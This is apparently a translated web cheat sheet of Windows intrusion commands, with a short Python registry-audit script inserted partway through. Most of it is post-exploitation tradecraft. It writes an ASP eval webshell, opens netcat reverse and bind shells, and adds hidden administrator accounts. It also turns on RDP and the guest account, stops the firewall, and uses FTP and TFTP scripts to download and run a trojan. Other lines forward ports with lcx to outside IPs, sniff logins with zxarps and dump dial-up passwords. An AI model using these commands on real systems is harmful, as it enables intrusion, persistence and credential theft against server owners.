Common penetration test commands in Windows

Source: Internet
Author: User
Tags: mstsc

echo ^<%eval request("#")%^> > C:\wmpub\hkfe666\h4ck.asp    (writes a one-line ASP file to that path)

md hack                      create the hack folder
Local:  nc -vv -l -p <port>
Server: <nc path> -e <cmd path> <ip> <port>

rd hack                      delete the hack folder
type d:\wwwroot\hack.asp
del d:\wwwroot\hack.asp      delete hack.asp
dir c:\                      view all folders and file information in the root of drive C
tree e:\                     display the directory tree of drive E
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
Checks whether the terminal port is 3389.
Under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server, check the value of fDenyTSConnections: 0 means Terminal Services is on, 1 means it is off.
netstat -ano shows whether 3389 is listening.
net stop yyagent
net stop sharedaccess
/c dir d:\freehost\weiquanguang\cnhonker*.* /w /o /s

First stop sharedaccess (net stop sharedaccess), then stop yyagent (net stop yyagent).

Administrator is allowed by default; for any other account you also need to add the user to the Remote Desktop Users group.
net user xxx pppp /add & net localgroup administrators xxx /add
net localgroup administrators xxx /add
net localgroup "Remote Desktop Users" xxx /add      grants Remote Desktop access
 
gpedit.msc

Common system commands
gpedit.msc      Group Policy
compmgmt.msc    Computer Management
devmgmt.msc     Device Manager
diskmgmt.msc    Disk Management
fsmgmt.msc      Shared Folders
lusrmgr.msc     Local Users and Groups
notepad         Notepad (write a text file)
services.msc    Services

Enable telnet
@echo off
sc config tlntsvr start= auto
net start telnet

End a process from CMD
1. Find the PID of the process with tasklist.
   Syntax: tasklist /svc. Then end it by PID (taskkill /pid <PID> /f) or by image name (taskkill /im <process name> /f).
2. ntsd -c q -p <PID> forcibly stops the running process.
zxarps.exe -idx 0 -ip <destination IP> -port 80,21,3389 -logfilter "+post,+user,+pass"
dialupass /allusers /stext "c:\1.txt"
==================================================================================
query user                   list logged-on users
logoff <ID>                  log off the session with that ID
net user                     view all users
C:\xp3389.exe -
net user 1 1 /add
net1 localgroup administrators 1 /add
C:\> net1 user guest /active:yes      enable the guest user
==================================================================================
whoami                       view the current account's privileges
Grant everyone full control of net.exe (system permissions)
C:\> c:\windows\system32\cacls.exe c:\windows\system32\net.exe /t /e /g everyone:f
==================================================================================
Adding an account from the FTP command line; very nice...
C:\> ftp
ftp> open 192.168.0.22
ftp> quote site exec net.exe user admin$ jinwei58 /add
ftp> quote site exec net.exe localgroup administrators admin$ /add
200 EXEC command successful (TID=33).
==================================================================================
FTP command
echo open <your FTP>>cmd.txt
echo <account>>>cmd.txt
echo <password>>>cmd.txt
echo binary>>cmd.txt
echo get trojan.exe>>cmd.txt
echo bye>>cmd.txt
ftp -s:cmd.txt
trojan.exe
del cmd.txt /q
==================================================================================
quote site exec net user <username> <password> /add      add a user
quote site exec net localgroup administrators <username> /add
tasklist /svc                list processes with their services
==================================================================================
SQL statements and user management
select MyCmd("net user");
select state("net user")
select external shell("net user")
==================================================================================
netstat
1. Query the terminal's open ports
netstat -an | find "3389"
==================================================================================
Query terminal port 3389
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
==================================================================================
2. Enable the terminal on 2003
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
==================================================================================
3. Change the terminal port to 2008 (0x7d8)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 0x7d8 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x7D8 /f
==================================================================================
4. Remove the XP & 2003 system firewall restrictions on Terminal Services and IP connections
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
==================================================================================
5. Enable the Win2000 terminal (restart required)
First upload the terminal-enabling tool to c:\ on the target host.
Run c:\ver3389.exe and wait for the system to restart.
==================================================================================
6. Command for when the terminal's maximum number of connections is exceeded
mstsc /v:<ip>:3389 /console
==================================================================================
Disable the firewall
net stop sharedaccess
==================================================================================
First upload the dual-session 3389 tool to c:\ on the target host.
Run c:\3389.exe.
==================================================================================
tasklist /svc > c:\3389.txt
==================================================================================
View ADSL dial-up credentials
dialupass.exe /allusers /stext "c:\1.txt"
==================================================================================
Port forwarding: lcx usage
lcx command
Run locally: lcx.exe -listen 3001 3002

C:\lcx.exe -slave 61.184.188.125 3001 <intranet IP of the compromised host> 3389
C:\recycler\lcx.exe -slave 121.61.225.211 3001 192.170.0.23 3389
Local connection: 127.0.0.1:3002
==================================================================================
Description of the nc command:
2. Privilege escalation with an nc reverse shell:
Run on the server: <nc path> -l -p 8080 -t -e <cmd path>
   -l   listen for inbound connections
   -p   the local port to open
   -t   answer the request as a telnet session
   -e   the program to redirect (execute)
Run locally: telnet <server IP> 446
Command: tftp -i <ip> get trojan.exe

Extra: upload nc through the webshell, bounce a shell back, forward the port data with htran, then sniff locally.
2. Reduce operation permissions
////////////////////////////
First listen on a local port:
nc -vv -l -p 8080
It is best to use port 80 or 8080, which is much less likely to be intercepted by the firewall.
Run the following in the webshell to connect back to the port we are listening on and get a cmd shell:
nc -vv <IP> 8080 -e "C:\Documents and Settings\All Users\Documents\cmd.exe"
==================================================================================
1. Query the terminal port

XP & 2003: reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

General purpose: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
type tsp.reg

2. Enable the XP & 2003 Terminal Service
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

3. Change the terminal port to 20008 (0x4E28)

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 0x4E28 /f

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x4E28 /f

4. Remove the XP & 2003 system firewall restrictions on the Terminal Service port and IP connections

reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 40404:TCP /t REG_SZ /d 40404:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
 
5. Enable the Win2000 terminal on port 3389 (restart required)

echo Windows Registry Editor Version 5.00>2000.reg
echo.>>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]>>2000.reg
echo "Enabled"="0">>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>>2000.reg
echo "ShutdownWithoutLogon"="0">>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]>>2000.reg
echo "EnableAdminTSRemote"=dword:00000001>>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>2000.reg
echo "TSEnabled"=dword:00000001>>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]>>2000.reg
echo "Start"=dword:00000002>>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>>2000.reg
echo "Start"=dword:00000002>>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]>>2000.reg
echo "Hotkey"="1">>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>2000.reg
echo "PortNumber"=dword:00000D3D>>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>2000.reg
echo "PortNumber"=dword:00000D3D>>2000.reg
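A defender-side check, added here as an example and not part of the original page: a Python audit that parses a .reg export such as the 2000.reg built above (or one taken with regedit /e) and flags the values these commands write, decoding the dword PortNumber (00000D3D is 3389) and the XP firewall GloballyOpenPorts entries. The function names, the WATCH meanings and the sample file are my own assumptions.

```python
import re
# Settings this page's commands change, matched case-insensitively on key-path tail + value name.
WATCH = {
    ("control\\terminal server", "fdenytsconnections"): "RDP denied when 1, allowed when 0",
    ("control\\terminal server", "tsenabled"): "Terminal Services on when 1 (Win2000)",
    ("control\\terminal server\\winstations\\rdp-tcp", "portnumber"): "RDP listener port",
    ("control\\terminal server\\wds\\rdpwd\\tds\\tcp", "portnumber"): "RDP default port",
}
FW_LIST = "globallyopenports\\list"  # every value under this key is a firewall exception
KEY_RE = re.compile(r"^\[([^\]]+)\]$")
VAL_RE = re.compile(r'^"([^"]+)"=(.+)$')
def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: value}}: dword -> int, "..." -> str."""
    keys, current = {}, None
    for line in (l.strip() for l in text.splitlines()):
        if m := KEY_RE.match(line):
            current = m.group(1)
            keys.setdefault(current, {})
        elif (m := VAL_RE.match(line)) and current is not None:
            name, raw = m.groups()
            if raw.lower().startswith("dword:"):
                raw = int(raw[6:], 16)  # dword:00000D3D -> 3389
            keys[current][name] = raw.strip('"') if isinstance(raw, str) else raw
    return keys
def audit(text):
    """Return (key, value_name, decoded_value, meaning) for every watched setting found."""
    findings = []
    for key, values in parse_reg(text).items():
        low = key.lower()
        if low.endswith(FW_LIST):  # entries look like "port:proto:scope:state:name"
            for name, value in values.items():
                port, proto, scope, state = str(value).split(":")[:4]
                findings.append((key, name, int(port), f"firewall exception {proto} from {scope} ({state})"))
            continue
        for (suffix, vname), meaning in WATCH.items():
            if low.endswith(suffix):
                for name, value in values.items():
                    if name.lower() == vname:
                        findings.append((key, name, value, meaning))
    return findings

SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000D3D
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
"""  # constructed sample: the 2000.reg fragment built above plus one XP firewall exception
```

Feed it the output of regedit /e from a host you administer; each finding is a setting worth comparing against your baseline.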
 
6. Force a restart of a Win2000 & Win2003 system (it restarts automatically once the last line runs)

@echo off & cd /d %temp% & echo [version]>restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$>>restart.inf
echo [DefaultInstall]>>restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
 
7. Disable TCP/IP port filtering (restart required)

reg add HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8. When the terminal's maximum number of connections is exceeded, connect with

mstsc /v:<ip>:3389 /console

9. Adjust NTFS partition permissions

cacls c:\ /e /t /g everyone:F                       (full control of drive C for everyone)

cacls %systemroot%\system32\*.exe /d everyone        (deny everyone access to the exe files in system32)
